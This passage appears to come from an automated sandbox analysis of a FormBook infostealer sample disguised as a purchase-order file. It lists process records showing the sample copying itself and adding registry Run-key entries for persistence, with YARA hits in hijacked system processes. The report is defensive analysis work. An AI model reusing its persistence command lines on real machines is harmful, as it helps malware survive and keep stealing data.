Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	05:30:38
Start date:	08/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	05:30:39
Start date:	08/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xa70000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	05:30:39
Start date:	08/10/2024
Path:	C:\Windows\SysWOW64\msdt.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\msdt.exe"
Imagebase:	0xe80000
File size:	389'632 bytes
MD5 hash:	BAA4458E429E7C906560FE4541ADFCFB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000025.00000002.2526649554.0000000000B30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000025.00000002.2526649554.0000000000B30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000025.00000002.2526649554.0000000000B30000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000025.00000002.2526649554.0000000000B30000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000025.00000002.2526649554.0000000000B30000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	05:30:46
Start date:	08/10/2024
Path:	C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif"
Imagebase:	0xa30000
File size:	24'576 bytes
MD5 hash:	30ECD7046839AF0716977A9EF6047E60
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000026.00000002.2627604465.0000000003F49000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000026.00000002.2627604465.0000000003F49000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000026.00000002.2627604465.0000000003F49000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000026.00000002.2627604465.0000000003F49000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000026.00000002.2627604465.0000000003F49000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	05:30:48
Start date:	08/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif"
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	05:30:48
Start date:	08/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	05:30:48
Start date:	08/10/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif"
Imagebase:	0x970000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	05:30:50
Start date:	08/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c Copy "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif" "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif"
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	05:30:50
Start date:	08/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff799c70000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	05:30:51
Start date:	08/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xad0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	05:30:51
Start date:	08/10/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\rundll32.exe"
Imagebase:	0x270000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000002D.00000002.2649126395.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000002D.00000002.2649126395.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000002D.00000002.2649126395.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000002D.00000002.2649126395.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000002D.00000002.2649126395.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	05:30:54
Start date:	08/10/2024
Path:	C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif"
Imagebase:	0x9a0000
File size:	24'576 bytes
MD5 hash:	30ECD7046839AF0716977A9EF6047E60
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000002E.00000002.2712579590.0000000004028000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000002E.00000002.2712579590.0000000004028000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000002E.00000002.2712579590.0000000004028000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000002E.00000002.2712579590.0000000004028000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000002E.00000002.2712579590.0000000004028000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 61%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	05:30:57
Start date:	08/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif"
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	05:30:57
Start date:	08/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	05:30:57
Start date:	08/10/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif"
Imagebase:	0x970000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	05:30:59
Start date:	08/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c Copy "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif" "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif"
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	05:30:59
Start date:	08/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	05:31:00
Start date:	08/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x710000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	05:31:00
Start date:	08/10/2024
Path:	C:\Windows\SysWOW64\wlanext.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\wlanext.exe"
Imagebase:	0x960000
File size:	78'336 bytes
MD5 hash:	0D5F0A7CA2A8A47E3A26FB1CB67E118C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000035.00000002.2731575552.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000035.00000002.2731575552.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000035.00000002.2731575552.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000035.00000002.2731575552.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000035.00000002.2731575552.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	05:31:02
Start date:	08/10/2024
Path:	C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif"
Imagebase:	0xf80000
File size:	24'576 bytes
MD5 hash:	30ECD7046839AF0716977A9EF6047E60
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000036.00000002.2805551760.0000000004534000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000036.00000002.2805551760.0000000004534000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000036.00000002.2805551760.0000000004534000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000036.00000002.2805551760.0000000004534000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000036.00000002.2805551760.0000000004534000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	05:31:05
Start date:	08/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif"
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	05:31:05
Start date:	08/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	05:31:05
Start date:	08/10/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif"
Imagebase:	0x970000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	05:31:07
Start date:	08/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c Copy "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif" "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif"
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	59
Start time:	05:31:07
Start date:	08/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	60
Start time:	05:31:08
Start date:	08/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x7ff7403e0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	61
Start time:	05:31:08
Start date:	08/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x650000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	62
Start time:	05:31:09
Start date:	08/10/2024
Path:	C:\Windows\SysWOW64\msdt.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\msdt.exe"
Imagebase:	0xe80000
File size:	389'632 bytes
MD5 hash:	BAA4458E429E7C906560FE4541ADFCFB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000003E.00000002.2823024000.0000000000960000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000003E.00000002.2823024000.0000000000960000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000003E.00000002.2823024000.0000000000960000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000003E.00000002.2823024000.0000000000960000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000003E.00000002.2823024000.0000000000960000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Has exited:	true

Show Windows behavior

Target ID:	63
Start time:	05:31:10
Start date:	08/10/2024
Path:	C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif"
Imagebase:	0x610000
File size:	24'576 bytes
MD5 hash:	30ECD7046839AF0716977A9EF6047E60
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000003F.00000002.2884163790.0000000003BB4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000003F.00000002.2884163790.0000000003BB4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000003F.00000002.2884163790.0000000003BB4000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000003F.00000002.2884163790.0000000003BB4000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000003F.00000002.2884163790.0000000003BB4000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 61%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	64
Start time:	05:31:13
Start date:	08/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif.pif"
Imagebase:	0x1b0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	65
Start time:	05:31:13
Start date:	08/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	66
Start time:	05:31:13
Start date:	08/10/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif.pif"
Imagebase:	0x970000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	67
Start time:	05:31:15
Start date:	08/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c Copy "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif" "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif.pif"
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	68
Start time:	05:31:15
Start date:	08/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	69
Start time:	05:31:16
Start date:	08/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xdd0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	70
Start time:	05:31:16
Start date:	08/10/2024
Path:	C:\Windows\SysWOW64\chkdsk.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\chkdsk.exe"
Imagebase:	0x130000
File size:	23'040 bytes
MD5 hash:	B4016BEE9D8F3AD3D02DD21C3CAFB922
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000046.00000002.2895699701.0000000005070000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000046.00000002.2895699701.0000000005070000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000046.00000002.2895699701.0000000005070000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000046.00000002.2895699701.0000000005070000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000046.00000002.2895699701.0000000005070000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Has exited:	true

Show Windows behavior

Target ID:	71
Start time:	05:31:23
Start date:	08/10/2024
Path:	C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif"
Imagebase:	0xee0000
File size:	24'576 bytes
MD5 hash:	30ECD7046839AF0716977A9EF6047E60
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000047.00000002.3030559754.00000000045B3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000047.00000002.3030559754.00000000045B3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000047.00000002.3030559754.00000000045B3000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000047.00000002.3030559754.00000000045B3000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000047.00000002.3030559754.00000000045B3000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Has exited:	true

Show Windows behavior

Target ID:	72
Start time:	05:31:26
Start date:	08/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif.pif"
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	73
Start time:	05:31:26
Start date:	08/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	74
Start time:	05:31:26
Start date:	08/10/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif.pif"
Imagebase:	0x970000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	75
Start time:	05:31:28
Start date:	08/10/2024
